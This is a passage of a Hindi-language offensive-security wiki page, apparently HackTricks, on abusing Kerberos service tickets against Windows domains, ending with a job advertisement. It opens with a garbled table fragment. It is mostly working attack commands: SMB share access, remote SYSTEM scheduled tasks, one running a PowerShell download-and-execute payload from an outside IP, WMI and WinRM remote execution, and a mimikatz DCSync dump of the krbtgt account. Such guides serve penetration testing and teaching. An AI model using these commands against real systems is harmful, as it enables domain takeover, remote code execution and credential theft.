HOST
RPCSS
| | PowerShell Remoting |HOST
HTTP
ओएस पर निर्भर करते हुए भी:
WSMAN
RPCSS
| | WinRM |HOST
HTTP
कुछ अवसरों पर आप सिर्फ पूछ सकते हैं: WINRM
| | निर्धारित कार्य | HOST | | Windows File Share, यह भी psexec | CIFS | | LDAP ऑपरेशन, DCSync सहित | LDAP | | Windows Remote Server Administration Tools |RPCSS
LDAP
CIFS
| | Golden Tickets | krbtgt | **Rubeus** का उपयोग करके आप इन सभी टिकटों के लिए पूछ सकते हैं पैरामीटर के साथ: * `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm` ## सेवा टिकटों का दुरुपयोग निम्नलिखित उदाहरणों में मान लें कि टिकट प्रशासक खाते का अनुकरण करके प्राप्त की गई है। ### CIFS इस टिकट के साथ आप **SMB** के माध्यम से `C$` और `ADMIN$` फोल्डर तक पहुंच सकते हैं (यदि वे उजागर हैं) और रिमोट फाइलसिस्टम के एक हिस्से में फाइलों की प्रतिलिपि बना सकते हैं बस ऐसा कुछ करके: ```bash dir \\vulnerable.computer\C$ dir \\vulnerable.computer\ADMIN$ copy afile.txt \\vulnerable.computer\C$\Windows\Temp ``` ### HOST इस अनुमति के साथ आप दूरस्थ कंप्यूटरों में निर्धारित कार्य उत्पन्न कर सकते हैं और मनमाने आदेश निष्पादित कर सकते हैं: ```bash #Check you have permissions to use schtasks over a remote server schtasks /S some.vuln.pc #Create scheduled task, first for exe execution, second for powershell reverse shell download schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe" schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" #Check it was successfully created schtasks /query /S some.vuln.pc #Run created schtask now schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName" ``` ### HOST + RPCSS इन टिकटों के साथ आप **पीड़ित सिस्टम में WMI निष्पादित कर सकते हैं**: ```bash #Check you have enough privileges Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local #Execute code Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand" #You can also use wmic wmic remote.computer.local list full /format:list ``` निम्नलिखित पृष्ठ में **wmiexec के बारे में अधिक जानकारी** प्राप्त करें: {% content-ref url="../ntlm/wmicexec.md" %} [wmicexec.md](../ntlm/wmicexec.md) {% endcontent-ref %} ### HOST + WSMAN (WINRM) winrm के माध्यम से एक कंप्यूटर तक **पहुँच** सकते हैं और यहाँ तक कि PowerShell भी प्राप्त कर सकते हैं: ```bash New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC ``` निम्नलिखित पृष्ठ पर जाएं ताकि **winrm का उपयोग करके दूरस्थ होस्ट से जुड़ने के और तरीके सीखें**: {% content-ref url="../ntlm/winrm.md" %} [winrm.md](../ntlm/winrm.md) {% endcontent-ref %} {% hint style="warning" %} ध्यान दें कि दूरस्थ कंप्यूटर पर पहुँचने के लिए **winrm सक्रिय और सुन रहा होना चाहिए**। {% endhint %} ### LDAP इस विशेषाधिकार के साथ आप **DCSync** का उपयोग करके DC डेटाबेस को डंप कर सकते हैं: ``` mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt ``` **DCSync के बारे में और जानें** निम्नलिखित पृष्ठ पर: {% content-ref url="dcsync.md" %} [dcsync.md](dcsync.md) {% endcontent-ref %} (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png)
यदि आप **हैकिंग करियर** में रुचि रखते हैं और अहैकिबल को हैक करना चाहते हैं - **हम भर्ती कर रहे हैं!** (_धाराप्रवाह पोलिश लिखित और बोली जाने वाली आवश्यकता_).
{% embed url="https://www.stmcyber.com/careers" %}